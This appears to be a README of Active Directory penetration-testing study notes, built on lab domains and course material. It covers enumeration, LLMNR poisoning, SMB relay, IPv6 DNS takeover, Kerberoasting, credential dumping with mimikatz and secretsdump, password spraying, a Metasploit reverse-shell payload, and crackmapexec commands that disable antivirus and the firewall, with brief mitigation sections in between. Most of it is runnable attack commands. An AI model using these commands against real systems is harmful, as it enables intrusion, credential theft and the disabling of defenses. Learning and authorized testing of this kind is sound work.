└── README.md
/README.md:
--------------------------------------------------------------------------------
1 |
2 |
AD-Pentesting-Notes :nepal:
3 |
4 |
63 | - Logical AD Components
64 | - The AD DS Schema
65 | - Defines every type of object that can be stored in the directory
66 | - Enforces rules regarding object creation and configuration
67 | - Class Object : User, Computer
68 | - Attribute Object : Display name
69 |
70 | **Network Enumeration - NMAP**
71 | - Enumerate Ports
72 | - `nmap -Pn -p- IP -vv -oA nmap/all-ports`
73 | - Extract Ports
74 | - `cat nmap/all-ports.nmap | awk -F/ '/open/ {b=b","$1} END {print substr(b,2)}'`
75 | - Enumerate Services
76 | - `nmap --Pn sC -sV -oA nmap/services -p(ports) IP --script=vuln -vv`
77 | - Domain Controller might have port opened like `53,88,135,139,389,445,464,593,636,3268,3269,3389`
78 | - Note Down the Full Qualified Domain Name, DNS Domain Name, DNS Computer Name and Computer Name with their IP and open ports.
79 | - Fully Qualified Domain Name: A fully qualified domain name (FQDN) is the complete domain name for a specific computer, or host, on the internet. The FQDN consists of two parts: the hostname and the domain name. For example, an FQDN for a hypothetical mail server might be mymail.somecollege.edu.
80 |
81 | **Network Enumeration - SMB**
82 | - List all SMB related script on NMAP. `ls /usr/share/nmap/scripts/ | grep smb`
83 | - `nmap -Pn --script smb-enum* -p139,445 IP | tee smb-enumeration`
84 | - `nmap -Pn --script smb-vuln* -p139,445 IP | tee smb-vulnerabilities`
85 |
86 | - SMB Enumerations with smbmap : `smbmap -H IP`
87 | - Recursive Lookup with smbmap : `smbmap -R -H IP`
88 | - Authenticated Enumeration with smbmap : `smbmap -H IP -d -u -p `
89 |
90 | - SMB Enumerations with smbclient : `smbclient -L IP`
91 | - Try to access the drive : `smbclient //IP/DriveName`
92 | - With Authentication : `smbclient //IP/DriveName -U htb.local\\username%password`
93 |
94 |
95 | **Domain Enumeration - ldapsearch**
96 | - View the naming contexts
97 | - `ldapsearch -x -H ldap://10.129.95.154 -s base namingcontexts`
98 | - [ldapsearch]() is a domain enumeration tool which opens a connection to an LDAP server, binds, and performs a search using specified parameters.
99 | - `ldapsearch -x -b "dc=htb,dc=local" -h -p `
100 | - The -x flag is used to specify anonymous authentication, while the -b flag denotes tha basedn to start from.
101 | - Dump only the users using ldapsearch
102 | - `ldapsearch -x -b "dc=htb,dc=local" -h -p 389 '(ObjectClass=User)' sAMAccountName | grep sAMAccountName | awk '{print $2}'`
103 | - Dump only the service accounts
104 | - `ldapsearch -x -b "dc=htb,dc=local" -h -p 389 | grep -i -a 'Service Accounts'`
105 | - Dump usersnames
106 | - `ldapsearch -H ldap://search.htb -x -D 'username@search.htb' -w "passwords" -b "DC=search,DC=htb" "objectclass=user" sAMAccountName | grep sAMAccountName | awk -F":" '{print $2}'`
107 |
108 | **Domain Enumeration - rpcclient**
109 | - RPC is a Remote Procedure call (protocol) that the program can use to request a service from a program which is located on another computer on the network without having to understand the network details
110 | - Rpcclient reqires credentials to access but in some cases Anonymous access is allowed.
111 | - Connect to target domain controller without authentication
112 | - `rpcclient -U=" " -N ` : Press enter on the password section.
113 | - Connect to target domain controller with authentication
114 | - `rpcclient -U="username" ` : Enter password on the password section
115 | - List the commands : `help`
116 | - Get server information : `srvinfo`
117 | - Enumerate the usernames : `enumdomusers`
118 | - Query the particular users : `queryuser `
119 | - List out password policy of the particular user. For this we ned the `rid` of that particular user which can be gained by above query
120 | - `getuserdompwinfo `
121 | - Lookup names command which can be used to lookup usernames on the domain controller. It can also be used for extracting their SID.
122 | - `lookupnames `
123 | - Create Domain Users
124 | - `createdomuser `
125 | - Delete Domain Users
126 | - `deletedomuser `
127 | - Enumerate Domains
128 | - `enumdomains`
129 | - Enumerate Domain Groups
130 | - `enumdomaingroups`
131 | - Query Domain Groups : You will need a rid for this which can be gained by above command.
132 | - `querygroup `
133 | - Query the display information about all the usrs in a domain controller
134 | - `querydispinfo`
135 | - Enumeate the SMB shares
136 | - `netshareenum`
137 | - Enumerate the privileges : `enumprivs`
138 |
139 |
140 | **Domain Enumeration - windapsearch**
141 | - [windapsearch](https://github.com/ropnop/windapsearch) is a python script to enumerate users, groups and computers from windows domain through LDAP.
142 | - Enumerate Users without credentials
143 | - `python3 windapsearch -d --dc-ip -U | tee windapsearch-enumeration-users`
144 | - Enumerate Users with credentials
145 | - `python3 windapsearch -d --dc-ip -u "domain\\username" -p "password" -U | tee winapsearch-authenticated-enumerations`
146 | - Enumerate Groups with credentials
147 | - `python3 windapsearch -d --dc-ip -u "domain\\username" -p "password" -G | tee winapsearch-authentication-group-enumerations`
148 | - Enumerate unconstrained computers
149 | - `python3 windapsearch -d --dc-ip -u "domain\\username" -p "password" --unconstrained-computers | tee unconstrained-computers-enumeration`
150 | - Unconstrained means that the computer is going to be able to impersonate anybody, if they have the hases for that. We can have the domain admin connected to these unconstrained comupter from there we can impersonate that as the domain admin.
151 |
152 | **Domain Enumeration - LdapDomainDump**
153 | - [LdapDomainDump](https://github.com/dirkjanm/ldapdomaindump) is a tool to enumerate users, groups and computers. A better tool than windapsearch.
154 | - `python3 ldapdomaindump.py --user "domain\\user" -p "password" ldap://DomainControllerIP:389 --no-json --no-grep -o output`
155 | - The result can be seen on output directory. Make a output directory before running the above commands.
156 | - Visualizing dump with a pretty output like enum4linux
157 | - `ldapdomaindump --user "search.htb\user" -p "password" ldap://search.htb:389 -o output`
158 | - `ldd2pretty --directory output`
159 |
160 | **Domain Enumeration - Enumerating with Enum4Linux**
161 | - Use cases
162 | - RID cycling (when RestrictAnonyomous is set to 1 on Windows 2000)
163 | - User Listing (when RestrictAnonymous is set to 0 on Windows 2000)
164 | - Listing of group memebership information.
165 | - Share enumeration
166 | - Detecting if host in a workgroup or domain
167 | - Identifying the remote operating system
168 | - Password policy retrieval (using polenum)
169 | - The Do Everything option
170 | - `enum4linux -a `. Here the IP is Domain Controller
171 | - The Do Everything option with authentication
172 | - `enum4linux -u username -p password -a `
173 | - List of usernames
174 | - `enum4linux -U `
175 | - List of usernames with authentication
176 | - `enum4linux -u username -p password -U `
177 | - Group Membership
178 | - `enum4linux -G IP`
179 | - Group nbtstat Information
180 | - `enum4linux -n IP`
181 | - Listing Windows shares
182 | - `enum4linux -S IP`
183 | - Getting Printer Information
184 | - `enum4linux -i iP`
185 | - Note down the Domain info like domain names, users and passwords, domain sid
186 |
187 | **Generate usernames from first name and last name**
188 | ```bash
189 | curl https://gist.githubusercontent.com/dzmitry-savitski/65c249051e54a8a4f17a534d311ab3d4/raw/5514e8b23e52cac8534cc3fdfbeb61cbb351411c/user-name-rules.txt >> /etc/john/john.conf
190 | john --wordlist=fullnames.txt --rules=Login-Generator-i --stdout > usernames.txt
191 | ```
192 | **Domain Enumeration: Enumerate users with Kerbrute**
193 | ```bash
194 | ./kerbrute_linux_amd64 userenum --dc 10.10.11.129 -d search.htb ~/htb/search/usernames.txt
195 | ```
196 |
197 | **Domain Enumeration NMAP Users**
198 | - Using LDAP
199 | - `nmap -p389 --script ldap-search --script-args 'ldap.username="cn=ippsec,cn=users,dc=pentesting,dc=local",ldap.password=Password12345,ldap.qfilter=users,ldap.attrib=sAMAccountName' -Pn -oA nmap/domain-users`
200 | - Where domain name = pentestig.local, username=ippsec, password=Password12345.
201 | - It will list all the available users on the domain.
202 | - For enumerating groups, change `cn=users` to `cn=groups` and `ldap.qfilter=users` to `ldap.qfilter=groups` from the above commands
203 | - Using Kerberos
204 | - `nmap -p88 --script=krb5-enum-users --script-args krb5-enum-users.realm='pentesting.local' -Pn` -> Anonymous enumeration
205 |
206 | **Domain Enumeration GetADUsers.py**
207 | - A python script developed by impacket to enumerate the domain users. [Download](https://github.com/SecureAuthCorp/impacket/blob/master/examples/GetADUsers.py)
208 | - `python3 GetADUsers.py -all pentesting.local/ippsec:Password12345 -dc-ip 192.168.10.50`
209 | - Where pentesting.local is domain name, ippsec and Password12345 is a credentials for domain controller 192.168.10.50
210 | - Other tools developed my impacket [here](https://github.com/SecureAuthCorp/impacket/tree/master/examples).
211 |
212 | - Find Delegations : AD delegation is critical part of security and compliance. By delegating control over active directory, you can grant users or groups the permissions they need without adding users to privileged groups like Domain Admins and Account Operators.
213 | - `python3 findDelegation.py -dc-ip 192.168.1.50 pentesting.local/ippsec:Password12345` - Download file from [here](https://github.com/SecureAuthCorp/impacket/blob/master/examples/findDelegation.py).
214 |
215 | **LLMNR Poisoning**
216 | - LLMNR : Link Local Multicast Name Resolution (LLMNR) is a protocol based on the Domain Name System (DNS) packet format that allows both IPv4 and IPv6 hosts to perform name resolution for hosts on the same local link.
217 | - Used to identify when DNS fils to do so.
218 | - Previously NBT-NS
219 | - Key flaw is that the services utilize a user's username and NTLMv2 hash when appropriately responded to
220 | - LLMNR Posioning is performed through a tool called [Responder](https://github.com/SpiderLabs/Responder). Responder a tool to run first thing in the morning when users gets connected to the network, or after launch time.
221 | - Syntax : `python Responder.py -I -rdw`
222 | - Once the event is triggered, Responder will capture victim's IP address, username and NTLMv2 Hash
223 |
224 | **Capturing NTLMv2 Hashes with Responder**
225 | - `responder -I eth0 -rdwv | tee responderHash.txt`
226 |
227 | **Password Cracking with Hashcat**
228 | - [Hashcat](https://github.com/hashcat/hashcat) is a tool utilized to crack hashes on different modules
229 | - Copy the hashes collected from the responder. Example
230 | - `echo "admin::N46iSNekpT:08ca45b7d7ea58ee:88dcbe4446168966a153a0064958dac6:5c7830315c7830310000000000000b45c67103d07d7b95acd12ffa11230e0000000052920b85f78d013c31cdb3b92f5d765c783030" > hash.txt`
231 | - `hashcat -m 5600 hash.txt /path/to/wordlist.txt`
232 | - Where m is a module and 5600 is a module for NTLMv2
233 |
234 | **LLMNR Poisoning Defense**
235 | - Disable LLMNR and NBT-NS
236 | - To disable LLMNR, select "Turn OFF Multicast Name Resolution" under Local Computer Policy > Computer Configuration > Administrative Templates > Network > DNS Client in the Group Policy Editor.
237 | - To disable NBT-NS, navigate to Network Connections > Network Adapter Properties > TCP/IPv4 Properties > Advanced tab > WINS tab and select "Disable NetBIOS over ICP/IP"
238 | - If a company must use or cannot disable LLMNR/NBT-NS, the best course of action is to:
239 | - Require Network Access Control. Example, MAC binding or switchport mode security so that an attacker device cannot connect into the network.
240 | - Require strong user passwords (e.g., > 14 characters in length and limit common usage).
241 |
242 | **SMB Relay Overview**
243 | - Instead of cracking hashes gathered with Responder, we can instead relay those hashes to specific machines and potentially gain access
244 | - Requirements
245 | - SMB signing must be disabled on the target
246 | - Replayed user credentials must be admin on machine
247 | - Grab the NTLM hash from one machine and relay that NTLM hash to another machine as specified on ntlmrelayx. Therefore at least two machine should be there to perform relay
248 | - Step 1
249 | - Discover Hosts with SMB Signing Disabled
250 | - `nmap --script=smb2-security-mode.nse -p445 192.168.57.0/24`
251 | - If the result is Message signing enabled but not required, then we can perform attack as well.
252 | - Step 2
253 | - Add the IPs with SMB signing disabled on targets.txt file.
254 | - Step 3
255 | - Open the responder configuration file and turn off the SMB and HTTP. `vim /usr/share/responder/Responder.conf` or `vim /etc/responder/Responder.conf`
256 | - We will be listening but not going to be responding
257 | - Step 4
258 | - Run Responder : `python Responder.py -I eth0 -rdwv`
259 | - Step 5
260 | - Run [NTLMrelayx](https://github.com/SecureAuthCorp/impacket/blob/master/examples/ntlmrelayx.py). `python ntlmrelayx.py -tf targets.txt -smb2support`
261 | - It takes the relay and passes it to the target file that you specify. -smb2support : incorporate anything with SMB too.
262 | - Wait until an event triggers
263 | - Step 6 : Win
264 | - It relays the credentials that it captures to this other machine. It will list the SAM files (same as /etc/shadow file on Linux)
265 | - We can crack those hashes to get the passwords or we can pass those hashes to get access to other machines as well.
266 | - Step 7 : Post Exploitation
267 | - Run responder as before
268 | - Run NTLMRelayx in interactive mode
269 | - `python ntlmrelayx.py -tf targets.txt -smb2support -i`
270 | - Setup a listener
271 | - `nc 127.0.0.1 ` Port number can be gained from the result from ntlmrelayx
272 | - `help` : Here we gained the SMB shell
273 | - List shares : `shares`
274 | - `Use C$`
275 | - `ls`
276 | - We can have a full access on the computer like we can add file, read file
277 | - We can also setup a meterpreter listener
278 | - `python ntlmrelayx.py -tf targets.txt -smb2support -e test.exe` where test.exe is a meterpreter payload (executable)
279 | - Executes some specifc commands
280 | - `python ntlmrelayx.py -tf targets.txt -smb2support -c "whoami"`
281 | - Getting a shell with [psexec](https://github.com/SecureAuthCorp/impacket/blob/master/examples/psexec.py)
282 | - `python3 psexec.py marvel.local/fcastle:Password1@192.168.57.141`
283 |
284 | **Defending SMB relay**
285 | - Enable SMB Signing on all devices (Best solution)
286 | - Pro : Completely stops the attack
287 | - Con : Can cause performance issues with file copies
288 | - Disable NTLM authentication on network
289 | - Pro : Completely stops the attack
290 | - Con : If Kerberos stops working, Windows defaults back to NTLM
291 | - Account tiering:
292 | - Pro : Limits domain admins to specific taks (e.g. only log onto servers with need for DA)
293 | - Con : Enforcing the policy may be difficult
294 | - Local admin restriction (Best solution)
295 | - Pro : Can prevent a lot of lateral movement
296 | - Con : Potential increase in the amount of service desk tickets
297 |
298 | **IPv6 Attacks**
299 | - DNS takeover attack via IPv6
300 | - It is another form of relaying attacks but its so much reliable because it utilizes IPv6.
301 | - Mostly IPv6 is turned on but only IPv4 is utilized.
302 | - If IPv4 is utilized, who's doing DNS for IPv6 and DNS in IPv6 lacks on most of the computers.
303 | - An attacker can setup a machine and listen for all the IPv6 messages that come through. (I AM YOUR DNS)
304 | - We can also get authentication to the Domain Controller when this happens
305 | - We can perform this attack with [mitm6](https://github.com/dirkjanm/mitm6)
306 |
307 | **IPv6 DNS Takeover via mitm6**
308 | - `mitm6 -d marvel.local` Keep this running
309 | - Setup a relay attack `ntlmrelayx.py -6 -t ldaps://192.168.57.140 -wh fakewpad.marvel.local -l lootme`
310 | - Where -6 is for IPv6, 192.168.57.140 is a domain controller and -l for loot to grab more information
311 | - Scenario : IPv6 is sending out a reply and its saying who's got my DNS and it sends it out every 30 minutes
312 | - More Details about [mitm6](https://blog.fox-it.com/2018/01/11/mitm6-compromising-ipv4-networks-via-ipv6/)
313 | - More Details about [Combining NTLM Relays and Kerberos Delegation](https://dirkjanm.io/worst-of-both-worlds-ntlm-relaying-and-kerberos-delegation/)
314 |
315 | **IPv6 Attack Defense**
316 | - IPv6 poisoning abuses the fact that Windows queries for an IPv6 adress even in IPv4-only environments. If you don't us IPv6 internaly, the safest way to prevent mitm6 is to block DHCPv6 traffic and incoming router advertisements in Windows Firewall via Group Policy. Disabling IPv6 entirely may have unwanted side effects. Setting the following predefined rules to Block instead of Allow prevents the attack from working:
317 | - (Inbound) Core Networking - Dynamic Host Configuration Protocol for IPv6(DHCPV6-In)
318 | - (Ibound) Core Networking - ROuter Advertisement (ICMPv6-In)
319 | - (Oubound) Core Networking - Dynamic Host Configuration Protocol for IPv6(DHCPV6-Out)
320 | - If WPAD is not in use internally, disable it via Group Policy and by disabling the WinHttpAutoProxySvc service.
321 | - Relaying to LDAP and LDAPS can only be mitigated by enabling LDAP signing and LDAP channel binding.
322 | - Consider Administrative users to the Protected Users group or marking them as Account is sensitive and cannot be delegated, which will prevent any impersonation of that use via delegation.
323 |
324 | **GetNPUsers & Kerberos Pre-Auth**
325 | - List down the users which have Kerberos Pre-Authentication disabled.
326 | - `python3 getnpusers.py htb.local/ -dc-ip 192.168.170.115`
327 | - Grab the HASH of the listed users
328 | - `python3 getnpusers.py htb.local/ dc-ip 192.168.170.115 -request`
329 | - With authentication
330 | - `impacket-GetNPUsers 'search.htb/user:password' -usersfile usernames.txt -dc-ip 'search.htb'`
331 |
332 |
333 | **AD Post Compromise Enumeration**
334 | - Domain Enumeration with [PowerView](https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1)
335 | - Powerview is a tool that allows us to look at the network and look at enumerate basically the Domain Controller, Domain Policy, Users group etc.
336 | - Download the powerview script from above.
337 | - `powershell -ep bypass`
338 | - Where, bypass is an execution policy and this removes the blockade of script exection.
339 | - Run the program `. .\PoweView.ps1`
340 | - Get Domain Infomation `Get-NetDomain`
341 | - Get Specific Domain Controllers - `Get-NetDomainController`
342 | - Get Domain Policy - `Get-DomainPolicy`
343 | - Get Specific policy like system access - `(Get-DomainPolicy)."system access"`
344 | - Get the users - `Get-NetUser`
345 | - Get the list of users - `Get-NetUser | select cn`
346 | - Get Domain ADmins - `Get-NetGroup -GroupName "Domain Admins"`
347 | - List all the files being shared on the network - `Invoke-ShareFinder`
348 | - [Powerview cheatsheet](https://gist.github.com/HarmJ0y/184f9822b195c52dd50c379ed3117993)
349 | - Bloodhound Overwiew and Setup
350 | - `sudo apt install bloodhound`
351 | - It runs on a tool called neo4j
352 | - `neo4j console` - Create a new password.
353 | - `bloodhound`
354 | - Grabbing Data with Invoke-Bloodhound
355 | - Download the [sharphound](https://github.com/puckiestyle/powershell/blob/master/SharpHound.ps1) script.
356 | - Move the file on compromised victim PC.
357 | - Enable execution `powershell -ep bypass`
358 | - Execute the script `. .\SharpHound.ps1`
359 | - Run the script `Invoke-BloodHound -CollectionMethod All -Domain MARVEL.local -ZipFileName file.zip`
360 | - All the data are collected on the zip file.
361 | - Move the file on an attacker machine.
362 | - Click on the upload data and upload the zip file
363 |
364 | **AD Post Compromise Attacks**
365 | - Pass the Hash/Password Overview
366 | - If we crack a password and/or can dump the SAM hashes, we can leverage both for lateral movement in networks.
367 | - Pass the Password : `crackmapexec smb -u -d -p `
368 | - Dumping Hashes with [secretsdump.py](https://github.com/SecureAuthCorp/impacket/blob/master/examples/secretsdump.py)
369 | - It is also a part of impacket tools
370 | - `secretsdump.py marvel/fcastle:Password1@192.168.57.141`
371 | - It dumps SAM hashes, DP API Key as well as LSA secrets
372 | - If there is a password reuse, the last bit of the hash will be the same
373 | - Cracking NTLM Hashes with Hashcat
374 | - `hashcat -m 1000 hashes.txt wordlist.txt -O`
375 | - Pass the Hash Attacks
376 | - Pass the Hash, Capture the last bit of the hash with psexec hashdump : `crackmapexec smb -u -H --local`
377 | - Pass Attacks Mitigation
378 | - Hard to completely prevent, but we can make it more difficult to an attacker.
379 | - Limit account re-use
380 | - Avoid re-using local admin password
381 | - Disable Guest and Administrator accounts
382 | - Limit who is a local administrator (least privilege)
383 | - Utilize strong passwords
384 | - The longer the better (>14 characters)
385 | - Avoid using common words
386 | - I like long sentences
387 | - Privilege Access Management (PAM)
388 | - Check out/in sensitive accounts when needed.
389 | - Automatically rotate passwords on check out and check in
390 | - Limits pass attacks as hash/password is strong and constantly rotated.
391 |
392 | **Token Impersonation Overview**
393 | - Tokens : Temporary keys that allow you access to a system/network without having to provide credentials each time you access a file. Think cookies for computers.
394 | - Types
395 | - Delegate : Created for logging into a machine or using Remote Desktop
396 | - Impersonate : "non-interactive" such as attaching a network drive or a domain logon script
397 |
398 | **Token Impersonation with Incognito**
399 | - `msfconsole`
400 | - `use exploit/windows/smb/psexec`
401 | - `set RHOSTS, SMBDomain, SMBPass and SMB User`
402 | - `show targets` : Choose Native Upload
403 | - `set target 2`
404 | - `set payload windows/x64/meterpreter/reverse_tcp`
405 | - `set lhost eth0`
406 | - `run`
407 | - Meterpreter session will be created. We can load incognito from meterpreter shell.
408 | - `load incognito`
409 | - `help` - It will show incognito command
410 | - `list_tokens -u` : List the tokens, we can impersonate the listed users.
411 | - `impersonate_token marvel\\administrator`
412 | - `shell`
413 | - `whoami`
414 |
415 | **Mitigation Strategies**
416 | - Limit user/group token creation permissions
417 | - Account tiering : Domain Administrator should login into the machines that they need to access which should only be domain controllers. If for some reasons that domain administrator logs into a user computer or a server and that user computer or server gets compromised. We can impersonate that token if we can compromised the domain controller.
418 | - Local admin restriction : If users are not local admins on their computers we cannot get a shell on that computer with their account that prevents us from gettig onto the computer and utilizing this kind of attack.
419 |
420 |
421 | **Kerberos Overview**
422 | - Kerberos is a network authentication protocol used in Windows Active Directory.
423 | - In this process, Clients connect and interact with the network authentication service, the client obtains tickets from the Key Distribution Center (KDC), After obtaining the ticket from the KDC, A client may use the ticket in order to communicate with the Application Servers.
424 | - Kerberos runs on Port 88 (UDP) by default.
425 | - Some terms to be cleared:
426 | - Client : A normal user who wants to access a service.
427 | - Key Distribution Center (KDC) : The most important component which plays the main role in the Authentication Process.
428 | - Application Server : Any Application Service such as SQL
429 | - TGT (Ticket Granting Ticket) : Ticket needed for requesting TGS from KDC, it is obtained from the KDC only.
430 | - TGS (Ticket Granting Service) : Ticket needed for authenticating against a particular service which is server account hash.
431 | - SPN (Service Principle Name) : SPN is an identifier for each service instance, it is one of the key components in the process of authentication.
432 |
433 | **Kerberoasting Attack**
434 | - Kerberoasting is an attack where an attacker can steal the Kerberos TGS Ticket which is encrypted.
435 | - The attacker can then attempt to crack it offline. The Kerberos uses a NTLM Hash in order to encrypt KRB_TGS of that service.
436 | - Whenn the domain user sent a request for TGS ticket to KDC for any service that has registered SPN, the KDC generates the KRB_TGS without identifying the user authorization against the requested service.
437 | - Step 1 : Get SPNs, Dump Hash
438 | - `python3 GetUserSPNs.py -dc-ip -request`
439 | - Step 2 : Crack that hash
440 | - `hashcat -m 13100 hash.txt wordlist.txt`
441 | - Step 2 : There is an option for an account to have the property “Do not require Kerberos preauthentication” or UF_DONT_REQUIRE_PREAUTH set to true. AS-REP Roasting is an attack against Kerberos for these accounts. If such we can perform the attack without password.
442 | - `python3 GetUserSPNs.py -dc-ip -request -no-pass`
443 | - If there are multiple users which needed to be tried without password then,
444 | - `for i in $(cat users.txt); do python3 GetNPUsers.py htb.local/$i -dc-ip 10.129.129.128 -no-pass -request; done`
445 |
446 | **Mitigation Strategies**
447 | - Strong Passwords
448 | - Least Privilege : Do not make your domain accounts or service accounts your domain administrators.
449 |
450 | **GPP /cPassword Attacks**
451 | - Group Policy Preferencecs allowed admins to create policies using embedded credentials.
452 | - These credentials were encrypted and placed in a "cPassword"
453 | - The key was accidently released
454 | - Patched in MS14-025, but doesn't prevent previous uses.
455 | - Group Policies are stored in SYSVOL on the domain controller, any domain user can read the policy and therefore decrypt the stored passwords.
456 | - The GPP or cpassword is stored on the Groups.xml file
457 | - Decrypt GPP : `gpp-decrypt `
458 |
459 | **DC Sync Attack**
460 | - A DC Sync Attack uses commands in Active Directory Replication Service Remote Protocol (MS-DRSR) to pretend to be a domain controller (DC) in order to get user credentials from another DC.
461 | - We need permission to actually replicate AD information. By default domain controllers have this permission called `Replicating Directory Changes` and `Replicating Directory Changes All`. These two permissions are needed to perform DC Sync attack.
462 | - The most common way to getting those permissions is to abuse the Microsoft Exchange Windows Permission Group. It is Microsoft's email server service and and integrates with Active Directory. AD grants that grup permission to modify permissions on the root of the domain. So if we get into that group we can abuse it to perform an attack.
463 | - It means that the credential you are using for this attach should be on that group.
464 | - `python3 secretsdump.py` htb.local/username:pasword@pc1.htb.local`
465 | - where pc1 is a machine name.
466 | - Use the acquired hash to perform pass the hash attack.
467 |
468 |
469 | **Mimikatz Overview**
470 | - [Mimikatz](https://github.com/gentilkiwi/mimikatz) is a tool used to view and steal credentials, generate Kerberos tickets, and levarage attacks.
471 | - Dumps credentials stored in memory.
472 | - Just a few attacks: Credential Dumping, Pass-the-Hash, Over-Pass-the-Hash, Pass-the-Ticket, Golden Ticket, Silver Ticket
473 | - The different modules mimikatz uses are explained on its [wiki](https://github.com/gentilkiwi/mimikatz/wiki)
474 |
475 | **Credential Dumping with Mimikatz**
476 | - Download the binary file into the compromised machine.
477 | - Open a CMD, navigate to the downloaded folder and execute the exe file. ./mimikatz.exe
478 | - Run the debug mode : `privilege::debug` . The debug means that it's allowing us to debug a process that we wouldn't otherwise have access to. Example: Dump information out of memory.
479 | - Dump the logon password.
480 | - `sekurlsa::logonpassword`
481 | - Dump the SAM hashes
482 | - `lsadump::sam`
483 | - Dump the LSA
484 | - `lsadump::lsa /patch`
485 |
486 | **SwisArmy CrackMapExec Intro**
487 | - A post exploitation tool that helps automate assessing the security of large Active Directory Networks
488 | - Available Protocols : ldap, mssql, smb, ssh, winrm
489 |
490 | **CrackMapExec Password Policy Checkup**
491 | - Before performing brute force attack using crackmapexec, it is always handful to analyze its password policy, so that we do not logout the users from their computer. It also helps on [generating password](https://github.com/nirajkharel/PasswordCracking/blob/main/README.md) as well.
492 | - `crackmapexec smb IP --pass-pol -u '' -p ''`
493 |
494 |
495 | **SwisArmy CrackMapExec Password Spraying**
496 | - Spray credentials to IP range
497 | - `crackmapexec smb 192.168.1.50-192.168.1.55 -u ippsec -p Password12345 --no-bruteforce`
498 | - It will also show if we have an admin access, if it has a admin access, it will show (Pwn3d!) message.
499 | - Spray different users and password combination
500 | - `crackmapexec smb 192.168.1.50-192.168.1.55 -u usernames.txt -p passwords.txt --no-bruteforce`
501 | - Spray Hashes to IP range
502 | - `crackmapexec smb 192.168.1.50-192.168.1.55 -H hashes.txt --no-bruteforce`
503 | - By default CrackMapExec exit after a successfull login is found. Using the `--continue-on-success` flag will continue spraying even after a valid password is found.
504 |
505 | **SwisArmy CrackMapExec ENUM 1**
506 | - Use smb modules to do some enumeration for the shares
507 | - `crackmapexec smb 192.168.1.50-192.168.1.55 -u ippsec -p Password12345 --shares`
508 | - It will provide the share name, permissions and remarks
509 | - We can follow the result gained by it using SMBCLIENT to access the shares after this.
510 | - Sessions
511 | - Take a look at a sesions and see if they is any sessions going on which we have access.
512 | - `crackmapexec smb 192.168.1.50-192.168.1.55 -u ippsec -p Password12345 --sessions`
513 | - Enumerate Disks
514 | - `crackmapexec smb 192.168.1.50-192.168.1.55 -u ippsec -p Password12345 --disks`
515 | - Logged on Users
516 | - See if we have any logged on users in the network
517 | - `crackmapexec smb 192.168.1.50-192.168.1.55 -u ippsec -p Password12345 --loggedon-users`
518 | - If we are a local admin, but we might not be a domain admin, if the logged on users are domain admin we will be able to dump the hashes and can perform Pass The Hash attack and get a sessions.
519 | - Get all users
520 | - `crackmapexec smb 192.168.1.50-192.168.1.55 -u ippsec -p Password12345 --users`
521 |
522 | **SwisArmy CrackMapExec ENUM 2**
523 | - Enumerate RID : Relative Identifier (RID) is a variable length number that is assigned to objects at creation and becomes part of the Objet's Security Identifier (SID) that uniquely identifies an account or group within a domain. Domain SID is same on a same domain but RID is different per object. Windows creates a RID by default in Active Directory. Example, RID 501 for administrator, 502 for default and 503 for guest account.
524 | - `crackmapexec smb 192.168.1.50-192.168.1.55 -u ippsec -p Password12345 --rid-brute` It will also show which are group, users, alias.
525 | - Enumerate Password Policy
526 | - `crackmapexec smb 192.168.1.50-192.168.1.55 -u ippsec -p Password12345 --pass-pol`
527 |
528 | **SiwsArmy CrackMapExec Command Execution**
529 | - `crackmapexec winrm 192.168.1.54 -u ippsec -p Password12345 -x 'whoami'`
530 | - Where 192.168.1.54 have a local domain access, -x is a commandline, -X powershell script or command line.
531 | - `crackmapexec winrm 192.168.1.54 -u ippsec -p Password12345 -X 'whoami'`
532 | - Verify local admin access
533 | - `crackmapexec winrm 192.168.1.54 -u ippsec -p Password12345 -X 'whoami /groups'`
534 | - If it is a part of BUILTIN\Administrator, it has local admin access on the machine.
535 | - Giving local admin access means giving them full control over the local computer.
536 | - Get Computer Status : like antivirus status, protections, real time protection.
537 | - `crackmapexec winrm 192.168.1.54 -u ippsec -p Password12345 -X 'Get-MpComputerstatus`
538 | - If we are a domain admin, we can disable such things.
539 | - Disable Monitoring
540 | - `crackmapexc winrm 192.168.1.54 -u ippsec -p Password12345 -X 'Set-MpPreference -DisableRealtimeMonitoring $true`
541 | - Disable Antivirus
542 | - `crackmapexec winrm 192.168.1.54 -u ippsec -p Password12345 -X 'Set-MpPreference -DisableIOAVProtection $true`
543 | - Verify if these are disabled or not
544 | - `crackmapexec winrm 192.168.1.54 -u ippsec -p Password12345 -X 'Get-MpComputerstatus'`
545 | - View all profiles, public private, firewalls
546 | - `crackmapexec winrm 192.168.1.54 -u ippsec -p Password12345 -X 'netsh advfirewall show allprofiles'`
547 | - If they are enabled, disable with
548 | - `crackmapexec winrm 192.168.1.54 -u ippsec -p Password12345 -X 'netsh advfirewall set allprofiles state off'`
549 | - Enumerate Directories
550 | - `crackmapexec winrm 192.168.1.54 -u ippsec -p Password12345 -X 'dir C:\Users\ippsec'`
551 | - Read Files
552 | - `crackmapexec winrm 192.168.1.54 -u ippsec -p Password12345 -X 'type C:\Users\ippsec\users.txt'`
553 |
554 | ### References
555 | - [TCM Security - Heath Adams](https://academy.tcm-sec.com) (Most of the contents)
556 | - [Top Five Ways I Got Domain on Your Internal Network Before Launch By Adam Toscher.](https://adam-toscher.medium.com/top-five-ways-i-got-domain-admin-on-your-internal-network-before-lunch-2018-edition-82259ab73aaa)
557 | - [Practical Ethical Hacking By TCM Security.](https://academy.tcm-sec.com/p/practical-ethical-hacking-the-complete-course)
558 | - [Active Directory Pentesting - Red Team By I.T & Security.](https://www.youtube.com/watch?v=gSpQMzINB6U&list=PLziMzyAZFGMf8rGjtpV6gYbx5hozUNeSZ)
559 | - https://www.youtube.com/watch?v=ajOr4pcx6T0
560 | - https://medium.com/@Shorty420/kerberoasting-9108477279cc
561 | - https://blog.rapid7.com/2016/07/27/pentesting-in-the-real-world-group-policy-pwnage/
562 | - https://dirkjanm.io/worst-of-both-worlds-ntlm-relaying-and-kerberos-delegation/
563 | - https://www.mindpointgroup.com/blog/how-to-hack-through-a-pass-back-attack/
564 |
--------------------------------------------------------------------------------